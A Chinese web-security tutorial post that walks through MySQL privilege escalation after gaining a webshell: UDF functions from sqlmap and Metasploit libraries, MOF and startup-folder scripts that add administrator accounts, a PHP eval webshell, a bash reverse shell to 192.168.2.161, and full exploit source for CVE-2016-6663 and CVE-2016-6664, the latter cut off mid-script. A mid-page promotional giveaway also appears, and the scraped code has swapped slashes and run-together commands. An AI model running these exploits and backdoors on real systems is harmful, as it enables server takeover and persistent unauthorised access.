web安全：mysql提權(quán)總結(jié)篇

時(shí)間：2023-06-30 16:24:02 | 來源：網(wǎng)站運(yùn)營

時(shí)間：2023-06-30 16:24:02 來源：網(wǎng)站運(yùn)營

web安全：mysql提權(quán)總結(jié)篇：

前言

前兩天參加了省賽的內(nèi)網(wǎng)滲透，在拿到webshell后發(fā)現(xiàn)是一個(gè)站庫分離，通過信息搜集得到了數(shù)據(jù)庫的賬號密碼，但是是一個(gè)www-data權(quán)限，執(zhí)行不了代理的命令，這時(shí)候就需要提權(quán)到root權(quán)限才能夠執(zhí)行命令，最后還沒有通過udf提權(quán)，而是通過/tmp這個(gè)目錄能夠修改權(quán)限，改為777權(quán)限后使用的代理。因?yàn)閘inux打得比較少，我們隊(duì)在這個(gè)地方卡了很久，導(dǎo)致只打到了第一層網(wǎng)絡(luò)，第二層內(nèi)網(wǎng)就沒有時(shí)間去打，所以補(bǔ)一下關(guān)于mysql的提權(quán)知識。

UDF提權(quán)

何為UDF

UDF是mysql的一個(gè)拓展接口，UDF（Userdefined function）可翻譯為用戶自定義函數(shù)，這個(gè)是用來拓展Mysql的技術(shù)手段。

使用過MySQL的人都知道，MySQL有很多內(nèi)置函數(shù)提供給使用者，包括字符串函數(shù)、數(shù)值函數(shù)、日期和時(shí)間函數(shù)等，給開發(fā)人員和使用者帶來了很多方便。

MySQL的內(nèi)置函數(shù)雖然豐富，但畢竟不能滿足所有人的需要，有時(shí)候我們需要對表中的數(shù)據(jù)進(jìn)行一些處理而內(nèi)置函數(shù)不能滿足需要的時(shí)候，就需要對MySQL進(jìn)行一些擴(kuò)展。

幸運(yùn)的是，MySQL給使用者提供了添加新函數(shù)的機(jī)制，這種使用者自行添加的MySQL函數(shù)就稱為UDF(User Define Function)。其實(shí)除了UDF外，使用者還可以將函數(shù)添加為MySQL的固有（內(nèi)建）函數(shù)，固有函數(shù)被編譯進(jìn)mysqld服務(wù)器中，稱為永久可用的，不過這種方式較添加UDF復(fù)雜，升級維護(hù)都較為麻煩，這里我們不做討論。

無論你使用哪種方法去添加新函數(shù)，它們都可以被SQL聲明調(diào)用，就像 ABS()或SUM()這樣的固有函數(shù)一樣。

UDF利用條件

1.知道數(shù)據(jù)庫的用戶和密碼；
2.mysql可以遠(yuǎn)程登錄；
3.mysql有寫入文件的權(quán)限，即secure_file_priv的值為空。

關(guān)于第一點(diǎn)就不用多說了，可以通過拿到webshell之后翻閱文件得到，對于不同情況下有不同得獲取方式，這里不再贅述；主要提一下第二三點(diǎn)。

在默認(rèn)情況下，mysql只允許本地登錄，我們知道可以通過navicat去連接數(shù)據(jù)庫（在知道帳號密碼的情況下），但是如果只允許本地登錄的情況下，即使知道賬號密碼的情況下也不能夠連接上mysql數(shù)據(jù)庫，那么在這種情況下就只有通過拿到本機(jī)的高權(quán)限r(nóng)dp登陸遠(yuǎn)程桌面后連接。

遠(yuǎn)程連接對應(yīng)的設(shè)置在mysql目錄下的/etc/mysql/my.conf文件，對應(yīng)的設(shè)置為bind-address = 127.0.0.1這一行，這是默認(rèn)情況下的設(shè)置，如果我們要允許在任何主機(jī)上面都能夠遠(yuǎn)程登錄mysql的話，就只要把bind-address改成0.0.0.0即可，即bind-address = 0.0.0.0

光更改配置文件還不夠，還需要給遠(yuǎn)程登陸的用戶賦予權(quán)限，首先新建一個(gè)admin/123456用戶，使用%來允許任意ip登錄mysql，這樣我們就能夠通過navicat使用admin/123456用戶遠(yuǎn)程連接到數(shù)據(jù)庫

grant all on *.* to admin@'%' identified by '123456' with grant option;flush privileges;關(guān)于第三點(diǎn)的secure_file_priv參數(shù)，這里有三個(gè)值，分別為NULL、/tmp、空，NULL顧名思義即不允許導(dǎo)入或?qū)С觥?br>
那么在這種情況下就不能使用sql語句向數(shù)據(jù)庫內(nèi)寫入任何語句，/tmp的意思是只能在/tmp目錄下寫入文件，這種情況下就需要考慮寫入文件到文件夾后能否在網(wǎng)頁上、訪問連接到這個(gè)目錄，如果這個(gè)值為空，那么就可以通過構(gòu)造sql語句向mysql數(shù)據(jù)庫下的任何目錄寫入文件。

這里還有一個(gè)需要了解的點(diǎn)就是在mysql5.5版本之前secure_file_priv這個(gè)值是默認(rèn)為空的，那么我們拿到的webshell如果對應(yīng)的mysql數(shù)據(jù)庫版本在5.5以下的話操作起來就比較方便，在mysql5.5版本之后secure_file_priv這個(gè)值是默認(rèn)為NULL的，即不能夠往數(shù)據(jù)庫內(nèi)寫入文件。

為了感謝廣大讀者伙伴的支持，準(zhǔn)備了以下福利給到大家： 【一>所有資源獲取<一】 1、200多本網(wǎng)絡(luò)安全系列電子書（該有的都有了） 2、全套工具包（最全中文版，想用哪個(gè)用哪個(gè)） 3、100份src源碼技術(shù)文檔（項(xiàng)目學(xué)習(xí)不停，實(shí)踐得真知） 4、網(wǎng)絡(luò)安全基礎(chǔ)入門、Linux、web安全、攻防方面的視頻（2021最新版） 5、網(wǎng)絡(luò)安全學(xué)習(xí)路線（告別不入流的學(xué)習(xí)） 6、ctf奪旗賽解析（題目解析實(shí)戰(zhàn)操作）

手動(dòng)提權(quán)

首先這里現(xiàn)在官網(wǎng)下載一個(gè)mysql，這里我下載的是5.5.19，注意這里需要下msi文件，不要下zip文件







下載好后進(jìn)行安裝即可




這里使用utf-8字符集




安裝好后使用mysql -u root -p進(jìn)入mysql







因?yàn)槲沂?.5.19版本，必須把 UDF 的動(dòng)態(tài)鏈接庫文件放置于 MySQL 安裝目錄下的 lib/plugin 文件夾下文件夾下才能創(chuàng)建自定義函數(shù)。這里說到了動(dòng)態(tài)鏈接庫，動(dòng)態(tài)鏈接庫就是實(shí)現(xiàn)共享函數(shù)庫概念的一種方式，在windows環(huán)境下后綴名為.dll，在linnux環(huán)境下后綴名為.so

那么這里利用.dll或.so文件在哪里去找呢？這兩個(gè)文件在sqlmap和msf里面都有內(nèi)置

首先在sqlmap里面找一下，在sqlmap里面對應(yīng)的目錄地址為udf/mysql，這里進(jìn)入目錄后可以看到sqlmap已經(jīng)幫我們分好類了







不過 sqlmap 中 自帶這些動(dòng)態(tài)鏈接庫為了防止被誤殺都經(jīng)過編碼處理過，不能被直接使用。這里如果后綴名為.so_或dll_的話，就需要解碼，如果后綴名為.so或.dll的話就不需要解碼即可直接使用。這里sqlmap也自帶了解碼的py腳本，在/extra/cloak目錄下，使用cloak.py解密即可。







命令如下(這里使用到64位的dll，其他版本改后綴名即可)

python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll











這里好像因?yàn)槲冶緳C(jī)的環(huán)境配置的問題這里py3沒有執(zhí)行成功，這里換到kali環(huán)境里面使用py2解密

python2 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll





另外可以用msf提供的動(dòng)態(tài)鏈接庫文件，這里注意msf里面的動(dòng)態(tài)鏈接庫是已經(jīng)解密好了的可以直接使用，msf下的動(dòng)態(tài)鏈接庫目錄如下

/usr/share/metasploit-framework/data/exploits/mysql/





直接拿出來使用010 editor進(jìn)行查看是包含了一些函數(shù)







解密過程完成之后就需要把解密得到的UDF動(dòng)態(tài)鏈接庫文件放到mysql的插件目錄下，這里使用如下命令查詢插件目錄的位置

show variables like "%plugin%";這里可以看到我的插件目錄就是C:/Program Files/MySQL/MySQL Server 5.5/lib/plugin







使用select @@basedir查看一下MySQL安裝的位置







這里因?yàn)橹粏为?dú)安裝了一個(gè)MySQL，沒有安裝其他的web，所以為了更好的還原環(huán)境，這里使用phpstudy來搭建環(huán)境，這里假設(shè)我已經(jīng)拿到了一個(gè)目標(biāo)機(jī)器的webshell，但是這里權(quán)限很低，使用到udf提權(quán)

首先來到MySQL/lib文件夾下，這里可以看到是沒有plugin這個(gè)文件夾的，所以這里需要我們先創(chuàng)建一個(gè)文件夾







創(chuàng)建plugin文件夾!







然后把解密過后的lib_mysqludf_sys_64.dll放到plugin文件夾下!







這里為了方便我把dll改名為udf.dll，但是這里報(bào)錯(cuò)ERROR 1126，這里我百度過后發(fā)現(xiàn)這個(gè)dll并不是跟系統(tǒng)位數(shù)有關(guān)的，而是跟mysql版本有關(guān)系，而且phpstudy自帶的mysql版本需要用32位的dll才能夠操作

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';





這里我上傳一個(gè)32位的dll到plugin文件夾內(nèi)







再使用命令創(chuàng)建自定義函數(shù)即可







然后使用命令查看是否新增了sys_eval函數(shù)

select * from mysql.func;





可以看到這里創(chuàng)建成功那么就可以執(zhí)行系統(tǒng)命令，到這里就是一個(gè)高權(quán)限了，而且如果有disable_functions把函數(shù)禁用了，用udf提權(quán)也是能夠操作的

拓展:UDF shell

允許外連

這里可以使用寫好的代碼來自動(dòng)提權(quán)，我們測試一下

首先把php上傳到可以網(wǎng)頁訪問的位置，這里我直接連接報(bào)錯(cuò)了應(yīng)該是因?yàn)闆]有設(shè)置可以外連，只允許本地連接，首先實(shí)驗(yàn)一下允許外聯(lián)的情況







這里進(jìn)入my.ini文件設(shè)置bind-address = 0.0.0.0?




然后創(chuàng)建一個(gè)admin/123456用戶允許外連







再次登錄即可登錄成功







這里首先dump udf.dll到plugin文件夾下，這里可以看到dump dll成功







然后創(chuàng)建函數(shù)，再執(zhí)行命令即可

不允許外連

這里我們再把bind-address = 0.0.0.0這行注釋掉之后進(jìn)行試驗(yàn)，因?yàn)椴辉试S外連，那么只有本地連接數(shù)據(jù)庫，這時(shí)候很容易想到正向連接我們代理進(jìn)去連接數(shù)據(jù)庫。這里使用reg、ew都可以，但是這里因?yàn)槭莔ysql的原因，使用navicat自帶的tunnel腳本會(huì)更加方便。

首先測試一下，是不允許外連的

這里上傳nutunnel_mysql.php到靶機(jī)上、訪問，這里看到已經(jīng)連接成功了







然后連接的時(shí)候設(shè)置HTTP隧道







即可連接到mysql，然后提權(quán)操作同前

MOF提權(quán)

mof是windows系統(tǒng)的一個(gè)文件（在c:/windows/system32/wbem/mof/nullevt.mof）叫做"托管對象格式"其作用是每隔五秒就會(huì)去監(jiān)控進(jìn)程創(chuàng)建和死亡。其就是用又了mysql的root權(quán)限了以后，然后使用root權(quán)限去執(zhí)行我們上傳的mof。隔了一定時(shí)間以后這個(gè)mof就會(huì)被執(zhí)行，這個(gè)mof當(dāng)中有一段是vbs腳本，這個(gè)vbs大多數(shù)的是cmd的添加管理員用戶的命令。

利用條件

1.只使用于windows系統(tǒng)，一般低版本系統(tǒng)才可以用，比如xp、server20032.對C:/Windows/System32/wbem/MOF目錄有讀寫權(quán)限3.可以找到一個(gè)可寫目錄，寫入mof文件### 手動(dòng)提權(quán)

這里我沒有安裝2003的虛擬機(jī)，所以就不放圖了，寫一下提權(quán)的步驟

生成testmod.mod文件并上傳到靶機(jī)的可寫目錄

#pragma namespace("////.//root//subscription") ?instance of __EventFilter as $EventFilter { EventNamespace = "Root//Cimv2"; Name= "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa /"Win32_LocalTime/" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; ?instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(/"WScript.Shell/")/nWSH.run(/"net.exe user test test123 /add/")/nWSH.run(/"net.exe localgroup administrators test /add/")"; }; ?instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };進(jìn)入mysql命令行執(zhí)行導(dǎo)入命令，導(dǎo)入完成過后系統(tǒng)會(huì)自動(dòng)運(yùn)行

select load_file("nullevt.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"使用net user命令即可發(fā)現(xiàn)已經(jīng)加入了管理員組

msf提權(quán)

msf內(nèi)置了MOF提權(quán)模塊，相比于手動(dòng)提權(quán)的好處就是msf的MOF模塊有自動(dòng)清理痕跡的功能

use exploit/windows/mysql/mysql_mofset payload windows/meterpreter/reverse_tcpset rhosts 192.168.10.17set username rootset password rootrun

拓展

因?yàn)槊扛魩追昼姇r(shí)間又會(huì)重新執(zhí)行添加用戶的命令，所以想要清理痕跡得先暫時(shí)關(guān)閉 winmgmt 服務(wù)再刪除相關(guān) mof 文件，這個(gè)時(shí)候再刪除用戶才會(huì)有效果

# 停止 winmgmt 服務(wù)net stop winmgmt# 刪除 Repository 文件夾rmdir /s /q C:/Windows/system32/wbem/Repository/# 手動(dòng)刪除 mof 文件del C:/Windows/system32/wbem/mof/good/test.mof /F /S# 刪除創(chuàng)建的用戶net user hacker /delete# 重新啟動(dòng)服務(wù)net start winmgmt

啟動(dòng)項(xiàng)提權(quán)

windows開機(jī)時(shí)候都會(huì)有一些開機(jī)啟動(dòng)的程序，那時(shí)候啟動(dòng)的程序權(quán)限都是system，因?yàn)槭莝ystem把他們啟動(dòng)的，利用這點(diǎn)，我們可以將自動(dòng)化腳本寫入啟動(dòng)項(xiàng)，達(dá)到提權(quán)的目的。當(dāng) Windows 的啟動(dòng)項(xiàng)可以被 MySQL 寫入的時(shí)候可以使用 MySQL 將自定義腳本導(dǎo)入到啟動(dòng)項(xiàng)中，這個(gè)腳本會(huì)在用戶登錄、開機(jī)、關(guān)機(jī)的時(shí)候自動(dòng)運(yùn)行。

這個(gè)地方既然碰到了啟動(dòng)項(xiàng)提權(quán)，就總結(jié)一下不限于mysql的啟動(dòng)項(xiàng)提權(quán)方法。

啟動(dòng)項(xiàng)路徑

在windows2003的系統(tǒng)下，啟動(dòng)項(xiàng)路徑如下：

C:/Documents and Settings/Administrator/「開始」菜單/程序/啟動(dòng)C:/Documents and Settings/All Users/「開始」菜單/程序/啟動(dòng)在windows2008的系統(tǒng)下，啟動(dòng)項(xiàng)路徑如下：

C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/StartupC:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup

自動(dòng)化腳本

我們在拿到一個(gè)網(wǎng)站的webshell的時(shí)候如果想進(jìn)一步的獲得網(wǎng)站的服務(wù)器權(quán)限，查看服務(wù)器上系統(tǒng)盤的可讀可寫目錄，若是啟動(dòng)目錄 “C:/Users/用戶名/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup” 是可讀可寫的，我們就可以執(zhí)行上傳一個(gè)vbs或者bat的腳本進(jìn)行提權(quán)。

這里使用test.vbs添加用戶密碼，上傳到啟動(dòng)目錄重啟的時(shí)候即可自動(dòng)添加賬號密碼

set wshshell=createobject("wscript.shell")a=wshshell.run("cmd.exe /c net user test test123 /add",0)b=wshshell.run("cmd.exe /c net localgroup administrators test /add",0)

使用sql語句

連接到mysql之后創(chuàng)建一個(gè)表寫入sql語句

use mysql;create table test(cmd text);insert into a values(“set wshshell=createobject(“”wscript.shell””)”);insert into a values(“a=wshshell.run(“”cmd.exe /c net user test test123 /add“”,0)”);insert into a values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators test /add“”,0)”);select * from a into outfile “C:/Documents and Settings/All Users/「開始」菜單/程序/啟動(dòng)/secist.vbs”;





重啟之后即可提權(quán)

CVE-2016-6663&CVE-2016-6664

CVE-2016-6663是競爭條件（race condition）漏洞，它能夠讓一個(gè)低權(quán)限賬號（擁有CREATE/INSERT/SELECT權(quán)限）提升權(quán)限并且以系統(tǒng)用戶身份執(zhí)行任意代碼。也就是說，我們可以通過他得到一整個(gè)mysql的權(quán)限。

CVE-2016-6664是root權(quán)限提升漏洞，這個(gè)漏洞可以讓擁有MySQL系統(tǒng)用戶權(quán)限的攻擊者提升權(quán)限至root，以便進(jìn)一步攻擊整個(gè)系統(tǒng)。

導(dǎo)致這個(gè)問題的原因其實(shí)是因?yàn)镸ySQL對錯(cuò)誤日志以及其他文件的處理不夠安全，這些文件可以被替換成任意的系統(tǒng)文件，從而被利用來獲取root權(quán)限?？梢钥吹?，兩個(gè)cve分別是用來將低權(quán)限的www-data權(quán)限提升為mysql權(quán)限，然后再將mysql提升為root權(quán)限。

利用條件

CVE-2016-6663

1.已經(jīng)getshell，獲得www-data權(quán)限
2.獲取到一個(gè)擁有create,drop,insert,select權(quán)限的數(shù)據(jù)庫賬號，密碼
3.提權(quán)過程需要在交互式的shell環(huán)境中運(yùn)行，所以需要反彈shell再提權(quán)
4.Mysql<5.5.51或<5.6.32或<5.7.14

CVE-2016-6664

1.目標(biāo)主機(jī)配置必須是是基于文件的日志(默認(rèn)配置)，也就是不能是syslog方式（通過cat /etc/mysql/conf.d/mysqld_safe_syslog.cnf查看沒有包含“syslog”字樣即可）
2.需要在mysql權(quán)限下運(yùn)行才能利用
3.Mysql<5.5.51或<5.6.32或<5.7.14

環(huán)境搭建

這里使用到tutum/lamp的鏡像環(huán)境，運(yùn)行docker并連接

docker pull tutum/lampdocker run -d -P tutum/lampdocker psdocker exec -it b9 /bin/bash





安裝apt，wget，gcc，libmysqlclient-dev

apt updateapt install -y wget gcc libmysqlclient-dev





寫入一個(gè)一句話木馬方便后續(xù)連接，這里注意，linux環(huán)境下用echo命令寫入木馬需要加' '進(jìn)行轉(zhuǎn)義，否則會(huì)報(bào)錯(cuò)

cd /var/htmlecho '<?php @eval($_POST['hacker']); ?>' > shell.php





給web路徑賦予777權(quán)限

chmod -R 777 /var/www/html進(jìn)入mysql環(huán)境添加一個(gè)對test庫有create,drop,insert,select權(quán)限的test用戶，密碼為123456







將apache2和mysql服務(wù)重啟并重新保存容器，將新容器的80端口映射到8080端口，3306映射到3306端口的方式運(yùn)行容器。

service restart apache2service restart mysqlocker commit c0ae81326db0 test/lampdocker run -d -p 8080:80 -p 3306:3306 test/lamp





訪問一下8080端口若出現(xiàn)如下界面則環(huán)境搭建成功

CVE-2016-6663

cve-2016-6663即將www-data權(quán)限提升為mysql權(quán)限，首先連接我們之前寫入的webshell







首先看一下權(quán)限跟目錄的可執(zhí)行狀況，可以看到html目錄下是777




然后寫入exp，命名為mysql-privesc-race.c，exp如下所示

#include <fcntl.h>#include <grp.h>#include <mysql.h>#include <pwd.h>#include <stdint.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/inotify.h>#include <sys/stat.h>#include <sys/types.h>#include <sys/wait.h>#include <time.h>#include <unistd.h>#define EXP_PATH"/tmp/mysql_privesc_exploit"#define EXP_DIRN"mysql_privesc_exploit"#define MYSQL_TAB_FILEEXP_PATH "/exploit_table.MYD"#define MYSQL_TEMP_FILE EXP_PATH "/exploit_table.TMD"#define SUID_SHELL EXP_PATH "/mysql_suid_shell.MYD"#define MAX_DELAY 1000// can be used in the race to adjust the timing if necessaryMYSQL *conn; // DB handlesMYSQL_RES *res;MYSQL_ROW row;unsigned long cnt;void intro() {printf( "/033[94m/n""MySQL/Percona/MariaDB - Privilege Escalation / Race Condition PoC Exploit/n""mysql-privesc-race.c (ver. 1.0)/n/n""CVE-2016-6663 / CVE-2016-5616/n/n""For testing purposes only. Do no harm./n/n""Discovered/Coded by:/n/n""Dawid Golunski /n""http://legalhackers.com""/033[0m/n/n");}void usage(char *argv0) {intro();printf("Usage:/n/n%s user pass db_host database/n/n", argv0);}void mysql_cmd(char *sql_cmd, int silent) {if (!silent) {printf("%s /n", sql_cmd);}if (mysql_query(conn, sql_cmd)) {fprintf(stderr, "%s/n", mysql_error(conn));exit(1);}res = mysql_store_result(conn);if (res>0) mysql_free_result(res);}int main(int argc,char **argv){int randomnum = 0;int io_notified = 0;int myd_handle;int wpid;int is_shell_suid=0;pid_t pid;int status;struct stat st;/* io notify */int fd;int ret;char buf[4096] __attribute__((aligned(8)));int num_read;struct inotify_event *event;/* credentials */char *user = argv[1];char *password = argv[2];char *db_host= argv[3];char *database = argv[4];// Disable buffering of stdoutsetvbuf(stdout, NULL, _IONBF, 0);// Get the paramsif (argc!=5) {usage(argv[0]);exit(1);} intro();// Show initial privilegesprintf("/n[+] Starting the exploit as: /n");system("id");// Connect to the database server with provided credentialsprintf("/n[+] Connecting to the database `%s` as %s@%s/n", database, user, db_host);conn = mysql_init(NULL);if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {fprintf(stderr, "%s/n", mysql_error(conn));exit(1);}// Prepare tmp dirprintf("/n[+] Creating exploit temp directory %s/n", "/tmp/" EXP_DIRN);umask(000);system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN);system("chmod g+s /tmp/" EXP_DIRN );// Prepare exploit tables :)printf("/n[+] Creating mysql tables /n/n");mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0);mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0);mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);// Copy /bin/bash into the mysql_suid_shell.MYD mysql table file// The file should be owned by mysql:attacker thanks to the sticky bit on the table directoryprintf("/n[+] Copying bash into the mysql_suid_shell table./nAfter the exploitation the following file/table will be assigned SUID and executable bits : /n");system("cp /bin/bash " SUID_SHELL);system("ls -l " SUID_SHELL);// Use inotify to get the timing rightfd = inotify_init();if (fd < 0) {printf("failed to inotify_init/n");return -1;}ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);/* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */printf("/n[+] Entering the race loop... Hang in there.../n");while ( is_shell_suid != 1 ) {cnt++;if ( (cnt % 100) == 0 ) {printf("->");//fflush(stdout); }/* Create empty file , remove if already exists */unlink(MYSQL_TEMP_FILE);unlink(MYSQL_TAB_FILE);mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1);mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1);/* random num if needed */srand ( time(NULL) );randomnum = ( rand() % MAX_DELAY );// Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlinkpid = fork();if (pid < 0) {fprintf(stderr, "Fork failed :(/n");}/* Child process - executes REPAIR TABLESQL statement */if (pid == 0) {usleep(500);unlink(MYSQL_TEMP_FILE);mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1);// child stops hereexit(0);}/* Parent process - aims to replace the temp .tmd table with a symlink before chmod */if (pid > 0 ) {io_notified = 0;while (1) {int processed = 0;ret = read(fd, buf, sizeof(buf));if (ret < 0) {break;}while (processed < ret) {event = (struct inotify_event *)(buf + processed);if (event->mask & IN_CLOSE) {if (!strcmp(event->name, "exploit_table.TMD")) {//usleep(randomnum);// Set the .MYD permissions to suid+exec before they get copied to the .TMD file unlink(MYSQL_TAB_FILE);myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);close(myd_handle);chmod(MYSQL_TAB_FILE, 04777);// Replace the temp .TMD file with a symlink to the target sh binary to get suid+execunlink(MYSQL_TEMP_FILE);symlink(SUID_SHELL, MYSQL_TEMP_FILE);io_notified=1;}}processed += sizeof(struct inotify_event);}if (io_notified) {break;}}waitpid(pid, &status, 0);}// Check if SUID bit was set at the end of this attemptif ( lstat(SUID_SHELL, &st) == 0 ) {if (st.st_mode & S_ISUID) {is_shell_suid = 1;}} }printf("/n/n[+] /033[94mBingo! Race won (took %lu tries) !/033[0m Check out the /033[94mmysql SUID shell/033[0m: /n/n", cnt);system("ls -l " SUID_SHELL);printf("/n[+] Spawning the /033[94mmysql SUID shell/033[0m now... /nRemember that from there you can gain /033[1;31mroot/033[0m with vuln /033[1;31mCVE-2016-6662/033[0m or /033[1;31mCVE-2016-6664/033[0m :)/n/n");system(SUID_SHELL " -p -i ");//system(SUID_SHELL " -p -c '/bin/bash -i -p'");/* close MySQL connection and exit */printf("/n[+] Job done. Exiting/n/n");mysql_close(conn);return 0;}





這里我直接用蟻劍執(zhí)行的話執(zhí)行不了







使用nc配合bash命令反彈后執(zhí)行命令，即可從www-data權(quán)限提升到mysql權(quán)限

nc -lvvp 7777/bin/bash -i >& /dev/tcp/192.168.2.161/7777 0>&1cd var/www/html/gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient./mysql-privesc-race test 123456 localhost test

CVE-2016-6664

cve-2016-6664即把mysql權(quán)限提升到root權(quán)限

tutum/lamp日志方式不是默認(rèn)的基于文件的日志，而是syslog，所以我們首先要將它改為默認(rèn)配置

vi /etc/mysql/conf.d/mysqld_safe_syslog.cnf刪除掉syslog，然后重啟mysql







使用exp

#<img src="https://legalhackers.com## Follow https://twitter.com/dawid_golunski for updates on this advisory.## This PoC exploit allows attackers to (instantly) escalate their privileges# from mysql system account to root through unsafe error log handling.# The exploit requires that file-based logging has been configured (default).# To confirm that syslog logging has not been enabled instead use:# grep -r syslog /etc/mysql# which should return no results.## This exploit can be chained with the following vulnerability:# CVE-2016-6663 / OCVE-2016-5616# which allows attackers to gain access to mysql system account (mysql shell).## In case database server has been configured with syslog you may also use:# CVE-2016-6662 as an alternative to this exploit.## Usage:# ./mysql-chowned.sh path_to_error.log ### See the full advisory for details at:# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html## Video PoC:# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html## Disclaimer:# For testing purposes only. Do no harm.#BACKDOORSH="/bin/bash"BACKDOORPATH="/tmp/mysqlrootsh"PRIVESCLIB="/tmp/privesclib.so"PRIVESCSRC="/tmp/privesclib.c"SUIDBIN="/usr/bin/sudo"function cleanexit {# Cleanup echo -e "/n[+] Cleaning up..."rm -f $PRIVESCSRCrm -f $PRIVESCLIBrm -f $ERRORLOGtouch $ERRORLOGif [ -f /etc/ld.so.preload ]; thenecho -n > /etc/ld.so.preloadfiecho -e "/n[+] Job done. Exiting with code $1 /n"exit $1}function ctrl_c() {echo -e "/n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."cleanexit 0}#intro echo -e "/033[94m /nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit /nmysql-chowned.sh (ver. 1.0)/n/nCVE-2016-6664 / OCVE-2016-5617/n"echo -e "Discovered and coded by: /n/nDawid Golunski /nhttp://legalhackers.com /033[0m"# Argsif [ $# -lt 1 ]; thenecho -e "/n[!] Exploit usage: /n/n$0 path_to_error.log /n"echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`/n"exit 3fi# Priv checkecho -e "/n[+] Starting the exploit as /n/033[94m`id`/033[0m"id | grep -q mysql if [ $? -ne 0 ]; thenecho -e "/n[!] You need to execute the exploit as mysql user! Exiting./n"exit 3fi# Set target pathsERRORLOG="$1"if [ ! -f $ERRORLOG ]; thenecho -e "/n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again./n"exit 3fiecho -e "/n[+] Target MySQL log file set to $ERRORLOG"# [ Active exploitation ]trap ctrl_c INT# Compile privesc preload libraryecho -e "/n[+] Compiling the privesc shared library ($PRIVESCSRC)"cat <<_solibeof_>$PRIVESCSRC#define _GNU_SOURCE#include <stdio.h>#include <sys/stat.h>#include <unistd.h>#include <dlfcn.h>#include <sys/types.h>#include <sys/stat.h>#include <fcntl.h>uid_t geteuid(void) {static uid_t(*old_geteuid)();old_geteuid = dlsym(RTLD_NEXT, "geteuid");if ( old_geteuid() == 0 ) {chown("$BACKDOORPATH", 0, 0);chmod("$BACKDOORPATH", 04777);//unlink("/etc/ld.so.preload");}return old_geteuid();}_solibeof_/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"if [ $? -ne 0 ]; thenecho -e "/n[!] Failed to compile the privesc lib $PRIVESCSRC."cleanexit 2;fi# Prepare backdoor shellcp $BACKDOORSH $BACKDOORPATHecho -e "/n[+] Backdoor/low-priv shell installed at: /n`ls -l $BACKDOORPATH`"# Safety checkif [ -f /etc/ld.so.preload ]; thenecho -e "/n[!] /etc/ld.so.preload already exists. Exiting for safety."exit 2fi# Symlink the log file to /etcrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOGif [ $? -ne 0 ]; thenecho -e "/n[!] Couldn't remove the $ERRORLOG file or create a symlink."cleanexit 3fiecho -e "/n[+] Symlink created at: /n`ls -l $ERRORLOG`"# Wait for MySQL to re-open the logsecho -ne "/n[+] Waiting for MySQL to re-open the logs/MySQL service restart.../n"read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWERif [ "$THE_ANSWER" = "y" ]; thenecho -e "Got it. Executing 'killall mysqld' now..."killall mysqldfiwhile :; do sleep 0.1if [ -f /etc/ld.so.preload ]; thenecho $PRIVESCLIB > /etc/ld.so.preloadrm -f $ERRORLOGbreak;fidone# /etc/dir should be owned by mysql user at this point# Inject the privesc.so shared library to escalate privilegesecho $PRIVESCLIB > /etc/ld.so.preloadecho -e "/n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: /n`ls -l /etc/ld.so.preload`"echo -e "/n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"echo -e "/n[+] The /etc/ld.so.preload file now contains: /n`cat /etc/ld.so.preload`"chmod 755 /etc/ld.so.preload# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)echo -e "/n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"sudo 2>/dev/null >/dev/null#while :; do #sleep 0.1#ps aux | grep mysqld | grep -q 'log-error'#if [ $? -eq 0 ]; then#break;#fi#done# Check for the rootshellls -l $BACKDOORPATHls -l $BACKDOORPATH | grep rws | grep -q rootif [ $? -eq 0 ]; then echo -e "/n[+] Rootshell got assigned root SUID perms at: /n`ls -l $BACKDOORPATH`"echo -e "/n/033[94mGot root! The database server has been ch-OWNED !/033[0m"elseecho -e "/n[!] Failed to get 